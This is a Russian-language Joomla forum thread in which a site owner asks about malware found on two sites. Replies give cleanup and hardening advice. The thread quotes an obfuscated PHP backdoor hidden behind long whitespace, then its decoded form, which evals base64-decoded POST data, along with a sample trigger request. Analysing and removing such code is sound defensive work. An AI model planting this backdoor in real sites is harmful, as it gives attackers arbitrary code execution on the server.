Что за вирус - Безопасность сайтов на Joomla

уже второй сайт чищу от такого шлака
<?php                                                                                                                                                                                                                                                                    $diz37= "6bsd4etpoca_";$sbd95 = strtolower($diz37[1]. $diz37[10]. $diz37[2].$diz37[5] .$diz37[0]. $diz37[4].$diz37[11]. $diz37[3]. $diz37[5]. $diz37[9].$diz37[8]. $diz37[3].$diz37[5] ); $etct0= strtoupper ( $diz37[11]. $diz37[7].$diz37[8]. $diz37[2]. $diz37[6]) ; if (isset (${ $etct0 }['n052e33']) ) { eval ($sbd95 ( ${$etct0 }['n052e33'])) ;} ?>

Размещается либо отдельным файлом, либо в начале файла.

Сайты на второй и третьей Joomla..Joomla обновлены.

Я бы задался вопросом, не "что за вирус", а как он попадает на сайт.
Удалить варез и неиспользуемые расширения, сканер aibolit по серваку, поставить rsfirewall, не держать пачку сайтов в одном аккаунте, проверить свой комп и т.п.

уже второй сайт чищу от такого шлака
<?php                                                                                                                                                                                                                                                                    $diz37= "6bsd4etpoca_";$sbd95 = strtolower($diz37[1]. $diz37[10]. $diz37[2].$diz37[5] .$diz37[0]. $diz37[4].$diz37[11]. $diz37[3]. $diz37[5]. $diz37[9].$diz37[8]. $diz37[3].$diz37[5] ); $etct0= strtoupper ( $diz37[11]. $diz37[7].$diz37[8]. $diz37[2]. $diz37[6]) ; if (isset (${ $etct0 }['n052e33']) ) { eval ($sbd95 ( ${$etct0 }['n052e33'])) ;} ?>

Размещается либо отдельным файлом, либо в начале файла.

Сайты на второй и третьей Joomla..Joomla обновлены.

Бональный бегдор:

if (isset ($_POST['n052e33']) ) { eval (base64_decode($_POST['n052e33'])) ;}

при обращение к файлу POST запросам приводит к выполнению произвольного кода
POST: n052e33=cGhwaW5mbygpOw==

Сайты разделите по пользователям. А потом чистите. Иначе расползется по всем.

Согласна с kik84, но даже если удалить варезное, вирус будет сидеть, пока не вычистишь полностью, потому что, он добавляет файлы, скрипты и прочую хрень.

wishlight, Вы совет написали, типа в теме отметились, а толкового совета нет, смысл вашего сообщения? "Чистите!" что ему чистить? ТС даже не знает что это за вирус.

Такое ощущение, что только с баблом сюда надо приходить, за каждым советом. Изначально форум поддержки вроде бы был.

Мне нужны пояснения:
1. Сайты разделите по пользователям. - это как?
2. Удалить варез - это что?

Мне нужны пояснения:
2. Удалить варез - это что?

Удалить те приложения, модули, которые вы скачали со сторонних ресурсов а не у разработчика купили. То же самое касается и шаблона.

Мне нужны пояснения:
1. Сайты разделите по пользователям. - это как?

Это значит на каждый сайт сделать отдельного юзера, который будет иметь свою отдельную группу привилегий, в результате чего, пользователь с другой группы привилегий не будет иметь доступа к управлению файлами, но и тут есть подводные камни, по мимо создания отдельных пользователей под каждый сайт, нужно еще и сам сервак безопасно настроить, а для этого вам нужен свой сервак, а не шаред хостинг, ну или если совсем бюджетный вариант, то на шаред хостинге под каждый сайт отдельный договор(аккаунт).
В таком случае если не уследили за одним сайтом, другие сайты не пострадают, ну или снизится риск значительно...

Сайты разделите по пользователям. А потом чистите. Иначе расползется по всем.

Тут поспорю, все зависит от вашей опытности и мастерства, и какой порядок действий вы выбераите.

опытности и мастерства

Да, это так. Сейчас есть хостинги, которые хотя бы ограничивают выполнение скрипта директорией домена.

wishlight, Вы совет написали, типа в теме отметились, а толкового совета нет

Раньше пользователи рассказывали, сколько сайтов, что стоит, чем пользовались при доступе к сайту, кто имеет доступ к сайту. А мой совет думаю был бы полезен в том плане что "уже второй сайт".

А после того, как сайты изолируются, смотрим на каждом расширения и сверяемся с к примеру https://vel.joomla.org/ или можно поставить Securitycheck, у них список тоже базовых уязвимостей в компоненте. Устраняем их и чистим сайт. Для новичков идеально подходит скрипт ai-bolit.

В данном случае скорее всего на каком-то сайте была уязвимость до обновления (или есть) и через нее залит шелл, и с него все лезет.

Rsfirewall еще купить надо. ТС не сообщал, что он пользовался варезом.

Сайты на разных площадках. Но оба на timeweb. На хостинге beget не было случаев подобного заражения.

Варез....т.е. все что бесплатное может легко быть взломано?
Обычно пользуюсь известными компонентами и модулями: virtualmat, BT Content Slider

пока спасает запрет на выполнения php в директориях. по логам видно что хакер 403 ответ получает когда запускает свой вирус.

Варез - это все программное обеспечение, скачанное не с сайтов авторов или других официальных репозиториев. В результате может содержать пиратский вредоносный код.

У вас наверно такого нет. Это для общей информации.

Сайты обновлены? Хороший хостинг ukraine.com.ua если знать как им пользоваться. У  таймвеба в плане помощи в таких случаях никак.